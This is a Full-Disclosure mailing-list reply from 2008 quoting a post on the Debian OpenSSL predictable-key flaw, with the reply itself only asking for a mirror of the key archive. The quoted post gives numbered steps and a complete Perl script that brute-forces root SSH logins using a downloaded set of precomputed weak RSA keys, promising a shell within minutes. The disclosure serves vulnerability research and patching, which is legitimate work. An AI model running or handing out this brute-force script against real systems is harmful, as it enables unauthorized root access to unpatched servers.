Re: [Full-disclosure] Working exploit for Debian generated SSH Keys

Sun, 18 May 2008 08:20:28 -0700 

Anyone have a copy of
rsa.2048.tar.bzip2<http://www.deadbeef.de/rsa.2048.tar.bzip2>?
The web server isn't playing nicely  ;-)

On Thu, May 15, 2008 at 2:35 AM, Markus Müller <[EMAIL PROTECTED]> wrote:

> Hi full-disclosure,
>
> the debian openssl issue leads that there are only 65.536 possible ssh
> keys generated, cause the only entropy is the pid of the process
> generating the key.
>
> This leads to that the following perl script can be used with the
> precalculated ssh keys to brute force the ssh login. It works if such a
> keys is installed on a non-patched debian or any other system manual
> configured to.
>
> On an unpatched system, which doesn't need to be debian, do the following:
>
> 1. Download http://www.deadbeef.de/rsa.2048.tar.bzip2
>
> 2. Extract it to a directory
>
> 3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
> Bits, generated on an upatched debian (this is the key this exploit will
> break)
>
> 4. Run the perl script and give it the location to where you extracted
> the bzip2 mentioned.
>
> #!/usr/bin/perl
> my $keysPerConnect = 6;
> unless ($ARGV[1]) {
>   print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
>   print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
>   print "By [EMAIL PROTECTED]";
>   exit 0;
> }
> chdir($ARGV[0]);
> opendir(A, $ARGV[0]) || die("opendir");
> while ($_ = readdir(A)) {
>   chomp;
>   next unless m,^\d+$,;
>   push(@a, $_);
>   if (scalar(@a) > $keysPerConnect) {
>      system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
> ".$_ } @a)." ".$ARGV[1]);
>      @a = ();
>   }
> }
>
> 5. Enjoy the shell after some minutes (less than 20 minutes)
>
> Regards,
> Markus Mueller
> [EMAIL PROTECTED]
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Reply via email to